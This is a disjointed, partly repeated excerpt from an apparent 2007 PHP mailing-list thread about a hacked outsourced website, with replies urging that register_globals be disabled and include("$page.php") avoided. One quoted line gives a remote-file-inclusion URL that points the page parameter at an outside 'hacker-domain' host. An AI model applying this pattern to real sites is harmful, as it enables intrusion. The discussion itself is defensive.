On Thu, March 15, 2007 9:15 am, Seak, Teng-Fong wrote:
> Stut wrote:
>> Seak, Teng-Fong wrote:
>>> But after I've spent some time reading the log files, I've
>>> finally
>>> found out how the hackers managed to achieve worm infiltration.
>>>
>>> Actually, they're using an URL like this:
>>>
>
> Seak, Teng-Fong wrote:
> > No, I don't deserve anything because, as I've written in the
> > original post (but I suppose you didn't notice), the website is
> > outsourced and made by a 3rd company.
Then you should be having this conversation with the 3rd party. They need
to validate *EVERY*
Seak, Teng-Fong wrote:
> No, I don't deserve anything because, as I've written in the
> original post (but I suppose you didn't notice), the website is
> outsourced and made by a 3rd company.
Well, I've just realised (and checked) that I forgot to mention that
my company's website was outsource
Turn off register_globals - if you pollute your scripts with global
variables like that you are asking for trouble. If you can't make sure you
clean the variable.
Using include("$page.php") is asking for trouble.
If you can get register_globals switched off (it's off by default in PHP5
for this
Stut wrote:
> Seak, Teng-Fong wrote:
>> But after I've spent some time reading the log files, I've finally
>> found out how the hackers managed to achieve worm infiltration.
>>
>> Actually, they're using an URL like this:
>> http://my-domain.com/index.php?page=http://hacker-domain.com/some-
